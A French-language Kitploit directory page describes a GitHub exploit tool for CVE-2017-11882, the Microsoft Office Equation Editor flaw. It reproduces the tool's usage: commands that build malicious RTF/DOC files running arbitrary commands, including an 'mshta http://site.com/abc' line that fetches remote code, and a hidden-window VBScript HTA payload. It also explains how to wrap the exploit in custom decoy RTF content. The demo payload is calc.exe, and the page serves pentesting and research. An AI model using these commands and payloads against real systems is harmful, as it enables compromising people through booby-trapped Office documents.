Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-11882-exp — Exploit pour CVE-2017-11882 (Microsoft Office Equation Editor) avec des scripts Python pour générer des fichiers RTF/DOC malveillants et exécuter des commandes arbitraires ou du shellcode via mshta. | Kitploit
Outils/GitHubGitHub/lisinan988/cve-2017-11882-exp
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHublisinan988/cve-2017-11882-exp

CVE-2017-11882-exp

Exploit pour CVE-2017-11882 (Microsoft Office Equation Editor) avec des scripts Python pour générer des fichiers RTF/DOC malveillants et exécuter des commandes arbitraires ou du shellcode via mshta.

Voir le dépôt
1il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2017-11882

43b Le script original provient de https://github.com/embedi/CVE-2017-11882

109b Le script original provient de https://github.com/unamer/CVE-2017-11882/ (Un grand merci à unamer, maintenant son code peut exécuter du shellcode ~)

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

Utilisation

root@kitploit:~
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

utiliser mshta

root@kitploit:~
python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

abc

root@kitploit:~
<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD> 
</HTML> 

La commande 43b ne peut pas dépasser 43 octets, la commande 109b ne peut pas dépasser 109 octets.

Exemple d'exploit pour CVE-2017-11882 (lancement de calc.exe comme payload)

Le dossier example contient un fichier .rtf qui exploite la vulnérabilité CVE-2017-11882 et exécute la calculatrice dans le système.

À propos du contenu personnalisé

En réalité, la méthode pour personnaliser le contenu a été apprise auprès d'autres experts. Le script a été écrit il y a longtemps et je n'avais pas l'intention de le rendre public. Mais comme quelqu'un dans le groupe l'a déjà publié, je n'ai pas le choix. En fait, la méthode est très simple : il suffit d'ouvrir le fichier .rtf normal avec un éditeur de texte, de copier tout le contenu avant {\*\datastore, puis de remplacer le contenu avant {\object\objautlink\objupdate. Il est donc très facile de l'écrire dans un script.

Utilisation pour ajouter du contenu personnalisé, choisissez l'un des scripts :

root@kitploit:~
python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc -i input.rtf

Le contenu personnalisé se trouve dans input.rtf.

Concernant le dernier script d'exploit de 605 octets d'unamer, je ne le mettrai pas à jour ; si ça vous intéresse, modifiez-le vous-même.

Télécharger l’outil